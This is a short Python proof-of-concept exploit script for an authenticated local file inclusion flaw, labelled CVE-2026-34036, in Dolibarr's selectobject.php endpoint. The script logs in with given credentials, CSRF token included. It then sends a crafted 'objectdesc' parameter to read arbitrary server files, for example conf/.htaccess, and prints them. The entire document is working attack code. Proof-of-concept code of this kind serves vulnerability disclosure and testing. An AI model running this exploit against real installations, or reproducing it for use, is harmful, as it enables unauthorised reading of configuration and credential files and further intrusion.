#!/usr/bin/env python3
"""CVE-2026-34036 - Dolibarr selectobject.php authenticated LFI PoC"""

import argparse
import re
import requests


def login(s, url, username, password):
    page = s.get(f"{url}/").text
    token = re.search(r'name="token"\s+value="([^"]*)"', page)
    s.post(f"{url}/index.php?mainmenu=home", data={
        "token": token.group(1) if token else "",
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password,
    })
    home = s.get(f"{url}/index.php?mainmenu=home").text
    if "/user/logout.php" not in home:
        raise SystemExit("[!] Login failed")
    print("[+] Login successful")


def read_file(s, url, path):
    resp = s.get(f"{url}/core/ajax/selectobject.php", params={
        "outjson": "0",
        "htmlname": "x",
        "objectdesc": f"A:{path}:0",
    })
    body = resp.text
    # Trim PHP warnings/fatal errors from output
    for marker in ("<br />\n<b>Warning", "<br />\n<b>Fatal error"):
        pos = body.find(marker)
        if pos != -1:
            body = body[:pos]
    return body.strip()


def main():
    p = argparse.ArgumentParser(description="CVE-2026-34036 PoC")
    p.add_argument("--url", default="http://127.0.0.1:8080")
    p.add_argument("--username", required=True)
    p.add_argument("--password", required=True)
    p.add_argument("--file", required=True, help="e.g. conf/.htaccess")
    args = p.parse_args()

    s = requests.Session()
    login(s, args.url, args.username, args.password)

    content = read_file(s, args.url, args.file)
    print(f"[+] {args.file}\n{'=' * 60}")
    print(content if content else "(empty)")
    print("=" * 60)


if __name__ == "__main__":
    main()